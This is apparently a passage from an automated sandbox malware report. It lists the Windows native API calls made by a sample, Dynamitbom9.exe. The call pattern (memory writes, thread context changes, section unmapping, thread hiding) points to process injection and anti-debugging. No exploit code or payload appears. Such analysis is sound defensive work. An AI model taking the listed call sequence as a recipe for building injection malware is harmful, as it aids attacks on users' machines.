    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F7FE1 NtResumeThread,3_2_001F7FE1
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA5EC0 NtReadVirtualMemory,NtReadVirtualMemory,4_2_1ECA5EC0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA5E80 NtReadFile,NtReadFile,4_2_1ECA5E80
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA5E40 NtQueueApcThread,NtQueueApcThread,4_2_1ECA5E40
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA5C10 NtQueryInformationProcess,NtQueryInformationProcess,4_2_1ECA5C10
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA5DC0 NtQuerySystemInformation,NtQuerySystemInformation,4_2_1ECA5DC0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA57F0 NtMapViewOfSection,NtMapViewOfSection,4_2_1ECA57F0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA55A0 NtFreeVirtualMemory,4_2_1ECA55A0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA52B0 NtCreateSection,NtCreateSection,4_2_1ECA52B0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA5390 NtDelayExecution,NtDelayExecution,4_2_1ECA5390
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA5190 NtCreateFile,NtCreateFile,4_2_1ECA5190
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA4EA0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,4_2_1ECA4EA0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA4E30 NtAdjustPrivilegesToken,NtAdjustPrivilegesToken,4_2_1ECA4E30
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA6460 NtSuspendThread,NtSuspendThread,4_2_1ECA6460
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA6580 NtUnmapViewOfSection,NtUnmapViewOfSection,4_2_1ECA6580
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA6070 NtResumeThread,NtResumeThread,4_2_1ECA6070
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA6130 NtSetContextThread,NtSetContextThread,4_2_1ECA6130
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA5E10 NtQueryValueKey,4_2_1ECA5E10
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA5E20 NtQueryVirtualMemory,4_2_1ECA5E20
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA5C40 NtQueryInformationToken,4_2_1ECA5C40
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA5D50 NtQuerySection,4_2_1ECA5D50
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA5AE0 NtProtectVirtualMemory,4_2_1ECA5AE0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA5BE0 NtQueryInformationFile,4_2_1ECA5BE0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA5860 NtOpenDirectoryObject,4_2_1ECA5860
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA59D0 NtOpenThread,4_2_1ECA59D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA5950 NtOpenProcess,4_2_1ECA5950
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA5960 NtOpenProcessToken,4_2_1ECA5960
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA54E0 NtEnumerateValueKey,4_2_1ECA54E0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA54B0 NtEnumerateKey,4_2_1ECA54B0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA55E0 NtGetContextThread,4_2_1ECA55E0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA5270 NtCreateProcessEx,4_2_1ECA5270
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA5210 NtCreateMutant,4_2_1ECA5210
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA5090 NtClose,4_2_1ECA5090
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA51D0 NtCreateKey,4_2_1ECA51D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA6660 NtWriteVirtualMemory,4_2_1ECA6660
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA6630 NtWriteFile,4_2_1ECA6630
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA65E0 NtWaitForSingleObject,4_2_1ECA65E0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA6200 NtSetInformationFile,4_2_1ECA6200
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_1ECA63D0 NtSetValueKey,4_2_1ECA63D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_001544D9 NtAllocateVirtualMemory,4_2_001544D9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_00157829 NtProtectVirtualMemory,4_2_00157829
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_00157C0A NtSetInformationThread,4_2_00157C0A
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_001580A5 NtSetInformationThread,4_2_001580A5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_001581E5 NtSetInformationThread,4_2_001581E5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_001582D5 NtSetInformationThread,4_2_001582D5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_0015076D NtSetInformationThread,4_2_0015076D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_0015083D NtSetInformationThread,4_2_0015083D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4_2_00150ADD NtProtectVirtualMemory,4_2_00150ADD
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_00153AE2 NtAllocateVirtualMemory,4_2_00153AE2
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_00157C17 NtSetInformationThread,4_2_00157C17
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_00157CC3 NtSetInformationThread,4_2_00157CC3
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_00157DFF NtSetInformationThread,4_2_00157DFF
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_00157E9B NtSetInformationThread,4_2_00157E9B
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_00157F37 NtSetInformationThread,4_2_00157F37
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_00157FE1 NtSetInformationThread,4_2_00157FE1
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F7C0A NtResumeThread,8_2_001F7C0A
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F7829 NtProtectVirtualMemory,8_2_001F7829
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F44D9 NtAllocateVirtualMemory,8_2_001F44D9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F0722 EnumWindows,NtSetInformationThread,TerminateProcess,NtAllocateVirtualMemory,8_2_001F0722
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F29F9 NtWriteVirtualMemory,8_2_001F29F9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F7C17 NtResumeThread,8_2_001F7C17
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F2A09 NtWriteVirtualMemory,8_2_001F2A09
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F083D NtSetInformationThread,TerminateProcess,8_2_001F083D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F2E9E NtWriteVirtualMemory,8_2_001F2E9E
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F7E9B NtResumeThread,8_2_001F7E9B
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F2CBD NtWriteVirtualMemory,8_2_001F2CBD
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F80A5 NtResumeThread,8_2_001F80A5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F2AD9 NtWriteVirtualMemory,8_2_001F2AD9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F82D5 NtResumeThread,8_2_001F82D5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F7CC3 NtResumeThread,8_2_001F7CC3
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F3AE2 NtAllocateVirtualMemory,8_2_001F3AE2
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F7F37 NtResumeThread,